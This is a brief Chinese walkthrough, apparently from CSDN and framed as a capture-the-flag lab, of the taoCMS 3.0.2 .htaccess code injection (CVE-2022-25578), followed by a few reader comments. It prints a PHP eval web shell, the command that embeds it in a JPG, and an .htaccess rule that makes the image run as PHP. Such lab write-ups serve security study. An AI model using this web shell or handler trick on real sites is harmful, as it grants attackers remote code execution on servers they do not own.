taocms 代码注入 (CVE-2022-25578)
名称:taocms 代码注入 (CVE-2022-25578)
描述:taoCMS是基于php+sqlite/mysql的国内最小(100Kb左右)的功能完善的CMS管理系统.体积小(仅180Kb)速度快,包含文件管理、数据采集、Memcache整合、用户管理等强大功能。
taocms v3.0.2 允许攻击者通过任意编辑.htaccess 文件来执行代码注入。
步骤1
网站搭建
点击{本站管理后台}
步骤2
查看并修改{.htaccess}
注:
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
步骤3
<?POST @eval($_POST['cmd']);?>
生成一个图片马
copy 1.jpg/b+123.php/a shell.jpg
步骤4
将图片马写入{.htaccess}进行覆盖
<FilesMatch "shell.jpg"> SetHandler application/x-httpd-php </FilesMatch>
步骤5
上传图片马
步骤6
访问上传的图片马
步骤7
使用蚁剑链接,得到flag
yuYux_yu: 版本太低,没有用
weixin_47115176: 谢了哥们
゛浅时光 -: 解决2 里面是 apt-get install ruby吧
CSDN-Ada助手: CS入门 技能树或许可以帮到你:https://edu.csdn.net/skill/gml?utm_source=AI_act_gml